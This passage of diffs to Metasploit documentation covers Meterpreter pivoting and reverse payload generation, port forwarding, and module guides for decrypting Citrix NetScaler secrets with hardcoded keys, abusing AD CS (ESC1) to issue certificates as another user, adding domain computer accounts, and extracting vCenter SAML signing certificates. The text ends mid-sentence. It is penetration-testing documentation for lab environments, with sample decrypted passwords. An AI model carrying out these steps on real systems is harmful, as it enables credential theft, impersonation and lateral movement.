+msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200774 bytes) to 172.19.185.34
+[*] Meterpreter session 1 opened (172.19.182.171:4578 -> 172.19.185.34:49674) at 2022-06-09 13:23:03 -0500
+```
+
+Create named pipe pivot listener on the pivot machine, setting `-l` to the pivot's bind address:
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > pivot add -t pipe -l 169.254.16.221 -n msf-pipe -a x64 -p windows
+[+] Successfully created pipe pivot.
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Now generate a separate payload that will connect back through the pivot machine. This payload will be executed on the final target machine.  Note there is no need to start a handler for the named pipe payload.
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > show options
+
+Module options (payload/windows/x64/meterpreter/reverse_named_pipe):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   PIPEHOST  .                yes       Host of the pipe to connect to
+   PIPENAME  msf-pipe         yes       Name of the pipe to listen on
+
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > set pipehost 169.254.16.221
+pipehost => 169.254.16.221
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > generate -f exe -o revpipe_meterpreter_msfpipe.exe
+[*] Writing 7168 bytes to revpipe_meterpreter_msfpipe.exe...
+```
+
+After running the payload on the final target machine a new session will open, via the Windows 11 169.254.16.221 pivot.
+```
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > [*] Meterpreter session 2 opened (Pivot via [172.19.182.171:4578 -> 169.254.16.221:49674]) at 2022-06-09 13:34:32 -0500
+
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                Connection
+  --  ----  ----                     -----------                                ----------
+  1         meterpreter x64/windows  WIN11\msfuser @ WIN11          172.19.182.171:4578 -> 172.19.185.34:49674 (172.19.185.34)
+  2         meterpreter x64/windows  WIN2019\msfuser @ WIN2019      Pivot via [172.19.182.171:4578 -> 172.19.185.34:49674]
+                                                                                 (169.254.204.110)
+
+```
+## Pivoting External Tools
+
+### portfwd
 *Note: This method is discouraged as you can only set up a mapping between a single port and another target host and port, so using the socks module below is encouraged where possible. Additionally this method has been depreciated for some time now.*

-### Local Port Forwarding
+#### Local Port Forwarding
 To set up a port forward using Metasploit, use the `portfwd` command within a supported session's console such as the Meterpreter console. Using `portfwd -h` will bring up a help menu similar to the following:

 ```
@@ -262,7 +335,7 @@ Connecting to 127.0.0.1:443... failed: Connection refused.

 Note that you may need to edit your `/etc/hosts` file to map IP addresses to given host names to allow things like redirects to redirect to the right hostname or IP address when using this method of pivoting.

-### Listing Port Forwards and Removing Entries
+#### Listing Port Forwards and Removing Entries
 Can list port forwards using the `portfwd list` command. To delete all port forwards use `portfwd flush`. Alternatively to selectively delete local port forwarding entries, use `portfwd delete -l <local port>`.

 ```
@@ -275,7 +348,7 @@ No port forwards are currently active.
 meterpreter >
 ```

-### Remote Port Forwarding
+#### Remote Port Forwarding
 This scenario is a bit different than above. Whereas previously we were instructing the session to forward traffic from our host running Metasploit, through the session, and to a second target host, with reverse port forwarding the scenario is a bit different. In this case we are instructing the session to forward traffic from other hosts through the session, and to our host running Metasploit. This is useful for allowing other applications running within a target network to interact with local applications on the machine running Metasploit.

 To set up a reverse port forward, use `portfwd add -R` within a supported session and then specify the `-l`, `-L` and `-p` options. The `-l` option specifies the port to forward the traffic to, the `-L` option specifies the IP address to forward the traffic to, and the `-p` option specifies the port to listen on for traffic on the machine that we have a session on (whose session console we are currently interacting with).
@@ -268,13 +268,17 @@ NAVIGATION_CONFIG = [
            nav_order: 1
          },
          {
-            path: 'dev/Setting-Up-a-Metasploit-Development-Environment.md',
+            path: 'Creating-Your-First-PR.md',
            nav_order: 2
          },
          {
-            path: 'Sanitizing-PCAPs.md',
+            path: 'dev/Setting-Up-a-Metasploit-Development-Environment.md',
            nav_order: 3
          },
+          {
+            path: 'Sanitizing-PCAPs.md',
+            nav_order: 4
+          },
          {
            old_wiki_path: "Navigating-and-Understanding-Metasploit's-Codebase.md",
            path: 'Navigating-and-Understanding-Metasploits-Codebase.md',
@@ -0,0 +1,212 @@
+This module takes a Citrix NetScaler `ns.conf` configuration file as input and extracts secrets that
+have been stored with reversible encryption. The module supports legacy NetScaler encryption (RC4)
+as well as the newer AES-256-ECB and AES-256-CBC encryption types. It is also possible to decrypt
+secrets protected by the Key Encryption Key (KEK) method, provided the key fragment files F1.key
+and F2.key are provided. Currently, keys for appliances in FIPS mode or running hardware HSM cannot 
+be extracted. Root access to a NetScaler device or access to a NetScaler configuration backup are
+the most effective means of acquiring the configuration file and key fragments.
+
+This module incorporates research published by dozer:
+
+https://dozer.nz/posts/citrix-decrypt/
+
+## Vulnerable Application
+This module is tested against the configuration files for NetScaler versions 10.x, 11x, 12.x and
+13.x. The module will work with files retrieved from a live NetScaler system as well as files
+extracted from an unencrypted NetScaler backup archive. This is possible because NetScaler uses
+well-known hard coded encryption keys which are visible on the system in the hidden file:
+
+`/nsconfig/.skf`
+
+These static keys are:
+
+```
+NetScaler RC4:
+  2286da6ca015bcd9b7259753c2a5fbc2
+NetScaler AES:
+  351cbe38f041320f22d990ad8365889c7de2fcccae5a1a8707e21e4adccd4ad9
+```
+The module is also able to decrypt secrets encrypted with NetScaler KEK, provided the associated
+`F1.key` and `F2.key` fragments are provided. Private key passphrases that use `-passcrypt` are not
+currently decryptable by this module, but any secret that uses the `-encrypted` parameter should be
+fully recoverable.
+
+## Verification Steps
+You must possess a NetScaler `ns.conf` file in order to use this module. If the NetScaler is running
+NS13.0 Build76.xx.nc or higher, or the administrator has configured KEK encryption, you must also
+possess the associated KEK key fragments in order to decrypt the file. All files must be local to
+the system invoking the module. Where possible, you should provide the `NS_IP` option to tag
+relevant loot entries with the IPv4 address of the originating system. If no value is provided for
+`NS_IP` the module defaults to assigning the loopback IP `127.0.0.1`.
+
+1. Acquire the `ns.conf` file, and associated `F1.key` and `F2.key` files if using NS KEK
+2. Start msfconsole
+3. Do: `modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt.rb`
+4. Do: `set ns_conf <path to ns.conf>` to provide the location of the NetScaler config file
+5. Do: `set ns_kek_f1 <path to f1.key>` if you are decrypting a file using NS KEK
+6. Do: `set ns_kek_f2 <path to f2.key>` if you are decrypting a file using NS KEK
+6. Do: `set ns_ip <NetScaler IPv4>` to attach the target NetScaler IPv4 address to loot entries
+7. Do: `dump`
+
+## Options
+### NS_CONF
+
+Path to the NetScaler configuration file on the local system. Example: `/tmp/ns.conf`
+
+### NS_KEK_F1
+
+Path to the first of two NS KEK fragments, if decrypting NS KEK. Example: `/tmp/F1.key`
+
+### NS_KEK_F2
+
+Path to the second  of two NS KEK fragments, if decrypting NS KEK. Example: `/tmp/F2.key`
+
+### NS_IP
+
+Optional parameter to set the IPv4 address associated with loot entries made by the module.
+
+## Scenarios
+
+### Acquire NetScaler Config File
+NetScaler configuration files can be retrieved from a live system by running
+
+`show ns.conf`
+
+From the nscli or
+
+`cat /nsconfig/ns.conf`
+
+from the BSD shell. These files can also be retrieved from NetScaler configuration backup
+archives which are generated from the appliance admin interface.
+
+### Acquire KEK Fragment Files
+As of NS13.0 Build76.xx.nc NetScaler requires mandatory use of the Key Encryption Key (KEK)
+scheme. If secrets within the config file use KEK, you must also posses the associated KEK F1
+and F2 fragment files in order to perform decryption. Secrets that require KEK fragments to
+decrypt will include the `-kek` parameter on the associated configuration line. It is possible
+for an admin to manually enable KEK in NS builds prior to Build76.xx.nc - if this has been done,
+the current KEK key fragments are located in the following paths:
+
+`/nsconfig/F1.key`
+`/nsconfig/F2.key`
+
+After NS13.0 Build76.xx.nc, KEK is mandatory and managed by the NetScaler itself. Key fragments
+are presumably regenerated during firmware upgrades, and a journal is maintained in `/nsconfig/keys`
+suffixed with a date stamp. The `F1.key` and `F2.key` files are ignored, and the new "current" KEK
+key is stored in hidden files at paths:
+
+`/nsconfig/.F1.key`
+`/nsconfig/.F2.key`
+
+As well as under `/nsconfig/keys`. Note that both fragments must be provided for successful
+decryption. The module can be run without providing KEK fragments, but will be unable to decrypt
+any secrets that use KEK encryption. An unencrypted NetScaler backup archive will contain all KEK
+fragments currently defined on the appliance as well as the current `ns.conf` file.
+
+### Running the Module
+
+Example run against config file without KEK from NetScaler VPX running NS11.0 Build 62.10.nc:
+```
+msf6 > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf.NS11.0-62.10.conf
+ns_conf => /tmp/ns.conf.NS11.0-62.10.conf
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump
+
+[*] Config line:
+add ssl certKey netscaler_cesium137_io -cert netscaler_cesium137_io.pem -key netscaler_cesium137_io.key -passcrypt "VbuAvo9nq18Zap0joBBv1a1Chm5BOerJ3GhYWU+Wbv0=" -expiryMonitor DISABLED
+[!] Not decrypting passcrypt entry:
+[!] Ciphertext: VbuAvo9nq18Zap0joBBv1a1Chm5BOerJ3GhYWU+Wbv0=
+[*] Config line:
+set ns encryptionParams -method AES256 -keyValue 7654526a2f3ceffd877b286a8acece43da700d06133dc985f7ebdeb076135bcb755472e04f5d92aba9f07334eb8e936a58782ce76bb3f6d6e44adf727e8e88d602b8bdae1817d26203fe281a8429574d -encrypted -encryptmethod ENCMTHD_3
+[+] Plaintext: AAAAAAXyju437Ecnb/iQpa55uUvOskx7S5hCq5dB4kMq+Lcx6g==
+[*] Config line:
+add authentication radiusAction UTIL1 -serverIP 10.100.10.13 -serverPort 1812 -radKey f8e4f532e9d4e6bebab169b3be9e77b5c851466b7760c469bd64a15d2e8d3c602025c41372094d06e207789d58b6acb7 -encrypted -encryptmethod ENCMTHD_3
+[+] Plaintext: hbZaADYDUmdHv7AhHsAb6eCde2M82m0
+[*] Config line:
+add authentication ldapAction LDAP -serverName ldap.cesium137.io -serverPort 636 -ldapBase "DC=chainheart,DC=com" -ldapBindDn wiz@cesium137.io -ldapBindDnPassword f5dc75680b925dbd3c0a8154c8fee056bfe77ac774797de3c0867d368bd09c2cdd872a36e15a1f07abf773740e2c8a12 -encrypted -encryptmethod ENCMTHD_3 -ldapLoginName sAMAccountName -groupAttrName memberOf -secType SSL -ldapHostname ldap.cesium137.io
+[+] User: wiz@cesium137.io
+[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
+[*] Config line:
+set ns rpcNode 10.100.10.11 -password 9ec84444b10941dc4222f93b29a75f0aa237ffdcc73a81355bf5d1cf3d80058daaad7ca58e488e54bc3ff3eea8ffd9eb -encrypted -encryptmethod ENCMTHD_3 -srcIP 10.100.10.11
+[+] Plaintext: 447a325517739063bbaa414ecf1d9c3
+[*] Config line:
+set ns rpcNode 10.100.10.12 -password dd5c0c4952509e2fcfaeb238dfc361b79a844df09254087920ee0cf4dc447161bde8491d8a39ded0fa2526cc46e6a00f -encrypted -encryptmethod ENCMTHD_3 -srcIP 10.100.10.11
+[+] Plaintext: 447a325517739063bbaa414ecf1d9c3
+[*] Config line:
+add lb monitor mon_ldaps LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password e209865546c3d2e8462e3e7a962252eb6d9e26374163c8d902fc3535cb12638c514765dcea4792eb1e3e6b5e1c1c4cef -encrypted -encryptmethod ENCMTHD_3 -LRTM DISABLED -secure YES -baseDN "DC=chainheart,DC=com" -bindDN wiz@cesium137.io -filter CN=builtin
+[+] User: wiz@cesium137.io
+[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
+[*] Config line:
+add lb monitor mon_ldap LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password 4ae7bec92e25d985df315e543b846b2c30346840d8e945f5073832c3e479d60eee581f67d671759ae555210529eaec8d -encrypted -encryptmethod ENCMTHD_3 -LRTM DISABLED -destPort 636 -secure YES -baseDN "DC=chainheart,DC=com" -bindDN wiz@cesium137.io -filter CN=builtin
+[+] User: wiz@cesium137.io
+[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > 
+```
+
+Example run against config file using KEK from NetScaler VPX running NS13.0 Build 85.15.nc:
+
+```
+msf6 > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf 
+ns_conf => /tmp/ns.conf
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f1 /tmp/F1.key
+ns_kek_f1 => /tmp/F1.key
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f2 /tmp/F2.key
+ns_kek_f2 => /tmp/F2.key
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump
+
+[*] Building NetScaler KEK from key fragments ...
+[+] NS KEK F1
+[+]      HEX: dd2588bb3cb20dd643216c33489776c78e8c56f13b1301e0984dc80564eea49e
+[+] NS KEK F2
+[+]      HEX: 45f9e6780a1dc40b6fe75bedf2f6dbb9a86e4315d07313014fe2381c52e44d8f
+[+] Assembled NS KEK AES key
+[+]      HEX: 54f202b9a94649fd9eaa3f13eab514a5a267f460db0a2393f8b25f321a7d79e0
+
+[*] Config line:
+add ssl certKey netscaler_cesium137_io -cert netscaler_cesium137_io.pem -key netscaler_cesium137_io.key 30f39257d8aacc737182568184e0d535002d90a7aba3454c1e8766a958d3a4a720e485c498adc681f0e7559ff633f932 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
+[+] Plaintext: zgkEUD86rUv76coT0DkIBj1xlp5qEzH
+[*] Config line:
+add ssl certKey ldap_cesium137_io -cert ldap_cesium137_io.pem -key ldap_cesium137_io.key d7902778370c616480ef781c5b3922ef31bd90e75dd3aecfa0fa8a5bafc4fa16b20ed2f7a07970c3f4d8ba201a3b9b72 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor ENABLED -notificationPeriod 90
+[+] Plaintext: YaqoRLtSnnMPgnWyhAedYv2RO1aVtx8
+[*] Config line:
+add ssl certKey mail_cesium137_io -cert mail_cesium137_io-g3.pem -key mail_cesium137_io-g3.key 0e5ca2011772a9943c8f4281668b7236a8dfb97da290487d1953fa5ef768272f33d20122b055878729c75c29efaa3291 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
+[+] Plaintext: TBkrkfnP4QOWIT0FX8QCLl2GkNrnM
+[*] Config line:
+add ssl certKey auth_cesium137_io -cert auth_cesium137_io-g3.pem -key auth_cesium137_io-g3.key d574cca92065da27309ce87a423ac82e0c1571cd4c6df59a725f7eabee97d40136a250152506cb15962e34c90f1dc25c -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
+[+] Plaintext: flEkB3SW4YTTi9HRNnffmvJLSgJhsz5
+[*] Config line:
+set ns encryptionParams -method AES256 -keyValue ec5d48485c6871d1d4a2b01f9126946c53aa49eae721c8114ba7a34a1b1f8eabd443a9d641bbf5ef67f2b0237c481673587846db5378f72f9025f0762f8f9cbeebf4a16aaa2782d5c6ecd90c48a1c30d -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35
+[+] Plaintext: AAAAAAXyju437Ecnb/iQpa55uUvOskx7S5hCq5dB4kMq+Lcx6g==
+[*] Config line:
+add authentication radiusAction APP01_DUO -serverIP 10.100.10.13 -serverPort 11812 -authTimeout 60 -radKey 535587632ffe91f2559fcf5902c7e4bf24961ee2e7f6285c03c87c2e65165fbc -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -accounting ON
+[+] Plaintext: IAmSam!
+[*] Config line:
+add authentication radiusAction APP01_DUO_CITRIXRECEIVER -serverIP 10.100.10.13 -serverPort 21812 -authTimeout 60 -radKey 6644f481004ac7dee5a05b5a8dc3d9d9ae8c76f5fe82e0430b43acd7fb5afe9c -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -accounting ON
+[+] Plaintext: IAmSam!
+[*] Config line:
+add authentication ldapAction AD_DUA2FAUSERS -serverName ldap.cesium137.io -serverPort 636 -authTimeout 60 -ldapBase "DC=cesium137,DC=io" -ldapBindDn ldap@cesium137.io -ldapBindDnPassword 7fbbf2ef9665641264406c17673c0cdb5774b76454f3ac8c7bb067dd0d2228c5 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -ldapLoginName sAMAccountName -searchFilter "&(objectCategory=user)(memberOf=CN=2FA-OWA,CN=Users,DC=cesium137,DC=io)" -groupAttrName memberOf -subAttributeName cn -secType SSL -passwdChange ENABLED -nestedGroupExtraction ON -groupNameIdentifier sAMAccountName -groupSearchAttribute memberOf -groupSearchSubAttribute CN
+[+] User: ldap@cesium137.io
+[+] Pass: Gr33n3gg$
+[*] Config line:
+set ns rpcNode 192.168.10.14 -password 2634fa338c457cb32fdf245873874a9b8fcd7128f6534641f49ea650e9f0974b -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -srcIP 192.168.10.14
+[+] Plaintext: SamIAm!
+[*] Config line:
+set ns rpcNode 192.168.10.15 -password 6955e686fc5dd3beee5013dad0e0fa6510a56029b52cc7d7ed15082a60ec6ce4 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -srcIP 192.168.10.14
+[+] Plaintext: SamIAm!
+[*] Config line:
+add lb monitor mon_ldaps LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password cc1f6bb054f5d63d5eb871fdd36ff573f3343c1e0238965682460c6f084d1e14-encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -LRTM DISABLED -secure YES -baseDN "DC=cesium137,DC=io" -bindDN ldap@cesium137.io -filter CN=builtin -devno 13862
+[+] User: ldap@cesium137.io
+[+] Pass: Gr33n3gg$
+[*] Config line:
+add lb monitor mon_ldap LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password 5c35e0aa5c3d999e9ff10de1fa32910f9ac28b1ee8824c2301ac964e1f5f987e-encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -LRTM DISABLED -destPort 636 -secure YES -baseDN "DC=cesium137,DC=io" -bindDN ldap@cesium137.io -filter CN=builtin -devno 13863
+[+] User: ldap@cesium137.io
+[+] Pass: Gr33n3gg$
+[*] Config line:
+add lb monitor mon-radius RADIUS -respCode 2 -userName ldap -password fda3a1c5990558d4bfae059f27191f4c91a2dfa826d7318db287e109f5da39f9 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35  -LRTM DISABLED -resptimeout 4 -destPort 1812 -devno 13864
+[+] User: ldap
+[+] Pass: Gr33n3gg$
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > 
+```
@@ -0,0 +1,139 @@
+## Vulnerable Application
+Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate
+template's configuration the resulting certificate can be used for various operations such as authentication.
+PFX certificate files that are saved are encrypted with a blank password.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/icpr_cert`
+3. Set the `CA`, `RHOSTS`, `SMBUser` and `SMBPass` options
+4. Run the module and see that a new certificate was issued or submitted
+
+## Options
+
+### CA
+The target certificate authority. The default value used by AD CS is `$domain-DC-CA`.
+
+### CERT_TEMPLATE
+The certificate template to issue, e.g. "User".
+
+### ALT_DNS
+Alternative DNS name to specify in the certificate. Useful in certain attack scenarios.
+
+### ALT_UPN
+Alternative User Principal Name (UPN) to specify in the certificate. Useful in certain attack scenarios. This is in the
+format `$username@$dnsDomainName`.
+
+## Actions
+
+### REQUEST_CERT
+Request a certificate. The certificate PFX file will be stored on success. The certificate file's password is blank.
+
+## Scenarios
+
+### Obtaining Configuration Values
+For this module to work, it's necessary to know the name of a CA and certificate template. These values can be obtained
+by a normal user via LDAP.
+
+```
+msf6 > use auxiliary/gather/ldap_query 
+msf6 auxiliary(gather/ldap_query) > set BIND_DN aliddle@msflab.local
+BIND_DN => aliddle@msflab.local
+msf6 auxiliary(gather/ldap_query) > set BIND_PW Password1!
+BIND_PW => Password1!
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_ADCS_CAS 
+ACTION => ENUM_ADCS_CAS
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+CN=msflab-DC-CA CN=Enrollment Services CN=Public Key Services CN=Services CN=Configuration DC=msflab DC=local
+=============================================================================================================
+
+ Name                  Attributes
+ ----                  ----------
+ cacertificatedn       CN=msflab-DC-CA, DC=msflab, DC=local
+ certificatetemplates  ESC1-Test || Workstation || ClientAuth || DirectoryEmailReplication || DomainControllerAuthentication || KerberosAuthentication || EFSRecovery || EFS || DomainController || WebServer || Machine || User || SubCA |
+                       | Administrator
+ cn                    msflab-DC-CA
+ dnshostname           DC.msflab.local
+ name                  msflab-DC-CA
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) >
+```
+
+### Issue A Generic Certificate
+In this scenario, an authenticated user issues a certificate for themselves using the `User` template which is available
+by default. The user must know the CA name, which in this case is `msflab-DC-CA`.
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+CA => msflab-DC-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+CERT_TEMPLATE => User
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
+[*] 192.168.159.10:445 - Binding to \cert...
+[+] 192.168.159.10:445 - Bound to \cert
+[*] 192.168.159.10:445 - Requesting a certificate...
+[+] 192.168.159.10:445 - The requested certificate was issued.
+[*] 192.168.159.10:445 - Certificate UPN: aliddle@msflab.local
+[*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1106
+[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20220824125053_default_unknown_windows.ad.cs_545696.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+### Issue A Certificate With A Specific subjectAltName (AKA ESC1)
+In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate for a different
+User Principal Name (UPN), typically one that is an administrator. Exploiting this misconfiguration to specify a
+different UPN effectively issues a certificate that can be used to authenticate as another user.
+
+The user must know:
+
+* A vulnerable certificate template, in this case `ESC1-Test`.
+* The UPN of a target account, in this case `smcintyre@msflab.local`.
+
+See [Certified Pre-Owned](https://posts.specterops.io/certified-pre-owned-d95910965cd2) section on ESC1 for more
+information.
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+CA => msflab-DC-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC1-Test
+CERT_TEMPLATE => ESC1-Test
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN smcintyre@msflab.local
+ALT_UPN => smcintyre@msflab.local
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
+[*] 192.168.159.10:445 - Binding to \cert...
+[+] 192.168.159.10:445 - Bound to \cert
+[*] 192.168.159.10:445 - Requesting a certificate...
+[+] 192.168.159.10:445 - The requested certificate was issued.
+[*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
+[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20220824125859_default_unknown_windows.ad.cs_829589.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
@@ -0,0 +1,100 @@
+## Vulnerable Application
+Add, lookup and delete computer accounts via MS-SAMR. By default standard active directory users can add up to 10 new
+computers to the domain. Administrative privileges however are required to delete the created accounts.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   1. Set the `COMPUTER_NAME` option for `DELETE_COMPUTER` and `LOOKUP_COMPUTER` actions
+4. Run the module and see that a new machine account was added
+
+## Options
+
+### SMBDomain
+
+The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
+default value.
+
+### COMPUTER_NAME
+
+The computer name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
+`LOOKUP_COMPUTER` and `DELETE_COMPUTER` actions.
+
+### COMPUTER_PASSWORD
+
+The password for the new computer. This option is only used for the `ADD_COMPUTER` action. If left blank, a random value
+will be generated.
+
+## Actions
+
+### ADD_COMPUTER
+
+Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
+user has exceeded the maximum number of computer accounts that they are allowed to create.
+
+After the computer account is created, the password will be set for it. If `COMPUTER_NAME` is set, that value will be
+used and the module will fail if the selected name is already in use. If `COMPUTER_NAME` is *not* set, a random value
+will be used.
+
+### DELETE_COMPUTER
+
+Delete a computer from the domain. This action requires that the `COMPUTER_NAME` option be set.
+
+### LOOKUP_COMPUTER
+
+Lookup a computer in the domain. This action verifies that the specified computer exists, and looks up its security ID
+(SID), which includes the relative ID (RID) as the last component.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, a new computer account is created and its details are logged to the database.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(admin/dcerpc/samr_computer) > show options 
+
+Module options (auxiliary/admin/dcerpc/samr_computer):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   COMPUTER_NAME                       no        The computer name
+   COMPUTER_PASSWORD                   no        The password for the new computer
+   RHOSTS             192.168.159.96   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT              445              yes       The target port (TCP)
+   SMBDomain          .                no        The Windows domain to use for authentication
+   SMBPass            Password1        no        The password for the specified username
+   SMBUser            aliddle          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_computer) > run
+[*] Running module against 192.168.159.96
+
+[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_computer) > creds
+Credentials
+===========
+
+host            origin          service        public             private                           realm   private_type  JtR Format
+----            ------          -------        ------             -------                           -----   ------------  ----------
+192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password      
+
+msf6 auxiliary(admin/dcerpc/samr_computer) >
+```
@@ -0,0 +1,98 @@
+Grab certificates from the vCenter server vmdird or vmafd database files and adds them to loot.
+This module will accept files from a live vCenter appliance or from a vCenter appliance backup
+archive; either or both files can be supplied to the module depending on the situation. The module
+will extract the vCenter SSO IdP signing credential from the vmdir database, which can be used to
+create forged SAML assertions and access the SSO directory as an administrator. The vmafd service
+contains the vCenter certificate store which from which the module will attempt to extract all vmafd
+certificates that also have a corresponding private key. Portions of this module are based on
+information published by Zach Hanley at Horizon3:
+
+https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/
+
+## Vulnerable Application
+This module is tested against the vCenter appliance but will probably work against Windows instances.
+It has been tested against files from vCenter appliance versions 6.5, 6.7, and 7.0. The module will
+work with files retrieved from a live vCenter system as well as files extracted from an unencrypted
+vCenter backup archive.
+
+## Verification Steps
+You must possess the vmdir and/or vmafd database files from vCenter in order to use this module. The
+files must be local to the system invoking the module. Where possible, you should provide the
